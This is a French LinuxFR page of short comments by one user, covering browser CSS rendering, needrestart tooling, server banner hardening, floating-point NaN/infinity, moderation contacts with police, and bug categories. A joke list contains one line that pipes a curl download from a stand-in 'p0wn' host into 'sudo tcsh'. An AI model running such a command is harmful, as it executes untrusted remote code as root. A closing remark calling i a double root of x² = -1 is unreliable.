Benoît Sibaud a écrit 10262 commentaires

Corrigé, merci.

Debian Sid et firefox 57.0.4-1

Debian Sid et chromium 63.0.3239.84

Firefox, computed style, div class content

border-left-color: rgb(147, 135, 123);
border-left-style: solid;
border-left-width: 1px;
color: rgb(0, 0, 0);
font-family: sans-serif;
font-size: 14.0833px;
line-height: 21.1333px;
list-style-image: none;
list-style-position: outside;
list-style-type: none;
margin-bottom: 5px;
padding-left: 5px;
text-align: justify;

Chromium, computed style, div class content

border-left-color:rgb(147, 135, 123);
border-left-style:solid;
border-left-width:1px;
color:rgb(0, 0, 0);
display:block;
font-family:sans-serif;
font-size:14.08px;
height:476.781px;
line-height:21.12px;
list-style-image:none;
list-style-position:outside;
list-style-type:none;
margin-bottom:5px;
padding-left:5px;
text-align:justify;
width:855.969px;

Avec ou sans justification du texte, on voit assez bien que Firefox intègre les formules dans chaque phrase, tandis que Chromium découpe avant/après chaque formule (et que la justification aère énormément les bouts de phrase du coup).

Première image :

Firefox

border-bottom-color: rgb(0, 0, 0);
border-bottom-style: none;
border-bottom-width: 0px;
border-image-outset: 0;
border-image-repeat: stretch stretch;
border-image-slice: 100%;
border-image-source: none;
border-image-width: 1;
border-left-color: rgb(0, 0, 0);
border-left-style: none;
border-left-width: 0px;
border-right-color: rgb(0, 0, 0);
border-right-style: none;
border-right-width: 0px;
border-top-color: rgb(0, 0, 0);
border-top-style: none;
border-top-width: 0px;
color: rgb(0, 0, 0);
display: inline;
font-family: sans-serif;
font-size: 14.0833px;
line-height: 21.1333px;
list-style-image: none;
list-style-position: outside;
list-style-type: none;
margin-bottom: 0px;
margin-left: 0px;
margin-right: 0px;
margin-top: 0px;
max-height: 14.0833px;
max-width: 100%;
-moz-border-bottom-colors: none;
-moz-border-left-colors: none;
-moz-border-right-colors: none;
-moz-border-top-colors: none;

Chromium

border-bottom-color:rgb(0, 0, 0);
border-bottom-style:none;
border-bottom-width:0px;
border-image-outset:0px;
border-image-repeat:stretch;
border-image-slice:100%;
border-image-source:none;
border-image-width:1;
border-left-color:rgb(0, 0, 0);
border-left-style:none;
border-left-width:0px;
border-right-color:rgb(0, 0, 0);
border-right-style:none;
border-right-width:0px;
border-top-color:rgb(0, 0, 0);
border-top-style:none;
border-top-width:0px;
color:rgb(0, 0, 0);
display:inline;
font-family:sans-serif;
font-size:14.08px;
height:14.0781px;
line-height:21.12px;
list-style-image:none;
list-style-position:outside;
list-style-type:none;
margin-bottom:0px;
margin-left:0px;
margin-right:0px;
margin-top:0px;
max-height:14.08px;
max-width:100%;
text-align:left;
width:935.969px;

Il fallait bien sûr lire « d'ores et déjà être utilisé par toute autre feuille ». J'ai eu un problème d'édition cette nuit avec le corps du journal dupliqué en plein milieu de mon texte…

Corrigé, merci.

Corrigé, merci.

Ubuntu 14.04 LTS / needrestart 0.5-1

# needrestart -rl -b
NEEDRESTART-VER: 0.3
NEEDRESTART-PKG: openssh-server

(paquet openssh-server, service ssh, binaire sshd)

Tandis que

# DEBIAN_FRONTEND=readline needrestart
Looking for daemons to restart
(...)
  1. ssh  2. none of the above

(Enter the items you want to select, separated by spaces.)

Which rc.d scripts should be restarted?

Les versions chez Ubuntu :

trusty (14.04LTS) : 0.5-1
xenial (16.04LTS) : 2.6-1
zesty : 2.11-2
artful : 2.11-4
bionic : 2.11-4

Je suis d'accord que la sécurité par l'obscurité n'est pas la solution ultime. En même temps:

• sur un Apache httpd, on peut régler ServerTokens Prod, ServerSignature Off
• sur un PHP, on peut régler expose_php = Off
• sur un Nginx, on peut avoir server_tokens off;
• et sur un sshd, on n'affiche pas "Ici il n'y a que Alice et Bob qui ont des comptes, alors ne vous fatiguez pas à tester les autres logins".

Ça paraît super pratique. Par contre, si l'information est disponible pour n'importe quel utilisateur de la machine, ça donne une aide non négligeable pour savoir quoi attaquer (y a même pas besoin de tester la fonction ou de vérifier la version du noyau).

À noter que needrestart (Debian/Ubuntu) renvoie des noms de paquets, et il faut en déduire le nom des services concernés (en particulier si le nom du service n'est pas le nom du paquet), tandis que needs-restarting (RedHat/CentOS) renvoie des noms de service ou des PID, et il faut en déduire le nom des paquets concernés. Les deux semblent être en évolution relativement rapide (lire « changent de comportement d'une version à l'autre de la distribution concernée »).

Exemple: les options -s et -r de needs-restarting sont apparus entre yum-utils-1.1.31-34.el7.noarch et yum-utils-1.1.31-40.el7.noarch par exemple. Ou le fait que Debian Jessie (oldstable) soit fournie avec needrestart 1.2 tandis que Stretch (stable) est fournie avec la 2.11 (à noter que jessie-backports fournit aussi la 2.11).

C'est "service restart" et non pas "service restart ".

Corrigé, merci.

• service civique reload
• curl --insecure https://domainelouche.example.invalid/p0wn/service.csh|sudo tcsh
• je clique sur le job Jenkins qui lance une tâche Rundeck qui permet à Ansible de lancer Maven qui se connecte en ssh pour que le python local exécute le script qui veille à lancer sudo pour qu'il appelle systemd pour poliment prévenir le service de bien vouloir se redémarrer

Et surtout je prends un café avant de redémarrer un service, au cas où.

Live CD ou DVD ? J'aurais plutôt traduit par CD/DVD amorçable (bootable), ou de dépannage, plutôt que de relance.

D'ailleurs ça serait bien de le déclarer dans l'AdL.

Voir
https://linuxfr.org/suivi/mecanisme-de-relance-par-mail-du-demandeur-a-l-origine-du-message
et
https://linuxfr.org/suivi/notifications-par-email-des-commentaires

Corrigé, merci.

[corollaire : dans quel contexte mathématique numérique théorique, x - x n'est pas zéro… ?]

En maths, soustraire des infinis fait rarement zéro. En informatique non plus d'ailleurs.

#include <iostream>
#include <cmath>
#include <cfloat>

int main() {
  float x;
  x = NAN;
  std::cout << "x: " << x << " x-x: " << (x-x) << std::endl;
  x = INFINITY;
  std::cout << "x: " << x << " x-x: " << (x-x) << std::endl;
}

x: nan x-x: nan
x: inf x-x: -nan

Corrigé, merci.

une réquisition judiciaire reçue (qui au final ne nous concernait pas, mais a donné l’occasion de discuter avec la police nationale) ;

Un simple courriel, avec en pièce jointe un document officiel numérisé. On vérifie les coordonnées commissariat/officier de police judiciaire fournies pour s'assurer que c'est bien une vraie demande. On voit que la demande n'est visiblement pas pour nous (pas une adresse de courriel de chez nous), on vérifie néanmoins à tout hasard si on n'a aucun trace de l'adresse de courriel visée (base de données web, listes de diffusion, serveur mail, etc.). On appelle le policier en charge du dossier pour lui expliquer que ce n'est pas avec nous qu'il faut voir, on lui donne les infos techniques en notre possession (le whois sur le bon domaine), il nous remercie, on lui confirme ça par courriel simple.

un cas d’usurpation d’identité et de harcèlement type « revenge porn » (discussion avec la gendarmerie nationale).

La situation était différente : on a eu un contenu envoyé en modération rejeté et un contenu publié dans les journaux (supprimé rapidement a posteriori), qui étaient manifestement illégaux. Puis un contact par courriel d'une personne disant être la victime qui était tombée sur le journal dans le cache Google alors qu'il était déjà supprimé chez nous. La situation était compliquée vu que justement l'auteur des faits usurpait des identités de la victime et de ses connaissances (ie le contact pouvait venir de l'usurpateur). Mais au final la seule information pertinente était de savoir où la plainte était déposée. Après vérification des coordonnées de la gendarmerie (ie on échangeait bien avec la victime), on l'appelle, on explique la situation, les infos en notre possession, et on envoie ensuite un courriel avec un document circonstancié contenant des copies des documents concernés, les nom/pseudos, adresses mail (visiblement toutes "fausses" au nom de la victime) et les IP en notre possession.

Il n'y a pas eu de suite, jusqu'ici.

Son User-agent indique juste une version de Java.

Corrigé, merci.

Ah la catégorie de bugs due à l'inattention… Bien vu.

Corrigé, merci.

La formule de la note par défaut est dans l'aide du site et la répartition du karma dans les statistiques sur les utilisateurs. Déjà il n'y a que 18 comptes actifs avec un karma négatif (parmi 2857).

Corrigé, merci.

Une théorie plus simple : si tu demandes à un collégien qu'elles sont les racines de x² = -1, il dira qu'il n'y en a pas. Si tu demandes à un élève en fin de lycée, il dira une racine double i. Le premier ne peut même pas imaginer l'existence de la solution. Il existe des cas où l'on découvre une nouvelle catégorie de problèmes/bugs, et forcément on n'avait pas mis en place des solutions aux problèmes/bugs que l'on ne connaissait pas encore. Or on découvre de temps en temps de nouvelles catégories de bugs (et on ne prouve que ce que l'on a spécifié).

Après on oublie aussi certaines catégories qui resurgissent plus tard (par exemple on sort un nouveau langage, sans IDE, sans bon compilateur, sans outils de vérification de code, etc. et hop on retrouve des vieux bugs). On a aussi des bugs connus mais que l'on pensait inexploitables en pratique et en fait si.